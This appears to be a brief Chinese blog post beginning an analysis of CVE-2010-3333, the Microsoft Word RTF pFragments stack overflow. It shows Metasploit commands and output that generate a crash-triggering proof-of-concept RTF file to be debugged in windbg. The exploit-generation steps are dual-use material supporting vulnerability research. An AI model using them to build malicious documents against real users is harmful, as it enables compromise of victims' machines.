CVE-2010-3333
阿新 • • 發佈:2017-10-05
oss brush within engine www date ets framework modules
0x00 RTF格式
RTF是Rich TextFormat的縮寫,意即富文本格式。
...(詳細分析再議)
0x01 漏洞分析
1.利用Metasploit生成可觸發漏洞的Poc樣本
msf > search cve-2010-3333
Matching Modules
================
Name Disclosure Date Rank Description
---- --------------- ---- -----------
exploit/windows/fileformat/ms10_087_rtf_pfragments_bof 2010-11-09 great MS10-087 Microsoft Word RTF pFragments Stack Buffer Overflow (File Format)
msf > use exploit/windows/fileformat/ms10_087_rtf_pfragments_bof
msf exploit(ms10_087_rtf_pfragments_bof) > info
Name: MS10-087 Microsoft Word RTF pFragments Stack Buffer Overflow (File Format)
Module: exploit/windows/fileformat/ms10_087_rtf_pfragments_bof
Platform: Windows
Privileged: No
License: Metasploit Framework License (BSD)
Rank: Great
Disclosed: 2010-11-09
Provided by:
wushi of team509
unknown
jduck <[email protected]>
DJ Manila Ice, Vesh, CA
Available targets:
Id Name
-- ----
0 Automatic
1 Microsoft Office 2002 SP3 English on Windows XP SP3 English
2 Microsoft Office 2003 SP3 English on Windows XP SP3 English
3 Microsoft Office 2007 SP0 English on Windows XP SP3 English
4 Microsoft Office 2007 SP0 English on Windows Vista SP0 English
5 Microsoft Office 2007 SP0 English on Windows 7 SP0 English
6 Crash Target for Debugging
Basic options:
Name Current Setting Required Description
---- --------------- -------- -----------
FILENAME msf.rtf yes The file name.
Payload information:
Space: 512
Avoid: 1 characters
Description:
This module exploits a stack-based buffer overflow in the handling
of the ‘pFragments‘ shape property within the Microsoft Word RTF
parser. All versions of Microsoft Office 2010, 2007, 2003, and XP
prior to the release of the MS10-087 bulletin are vulnerable. This
module does not attempt to exploit the vulnerability via Microsoft
Outlook. The Microsoft Word RTF parser was only used by default in
versions of Microsoft Word itself prior to Office 2007. With the
release of Office 2007, Microsoft began using the Word RTF parser,
by default, to handle rich-text messages within Outlook as well. It
was possible to configure Outlook 2003 and earlier to use the
Microsoft Word engine too, but it was not a default setting. It
appears as though Microsoft Office 2000 is not vulnerable. It is
unlikely that Microsoft will confirm or deny this since Office 2000
has reached its support cycle end-of-life.
References:
https://cvedetails.com/cve/CVE-2010-3333/
OSVDB (69085)
https://technet.microsoft.com/en-us/library/security/MS10-087
http://www.securityfocus.com/bid/44652
http://labs.idefense.com/intelligence/vulnerabilities/display.php?id=880
msf exploit(ms10_087_rtf_pfragments_bof) > set target 6
target => 6
msf exploit(ms10_087_rtf_pfragments_bof) > exploit
[*] Creating ‘msf.rtf‘ file ...
[+] msf.rtf stored at /home/moonagirl/.msf4/local/msf.rtf
獲取樣本後,我們利用windbg進行分析。
CVE-2010-3333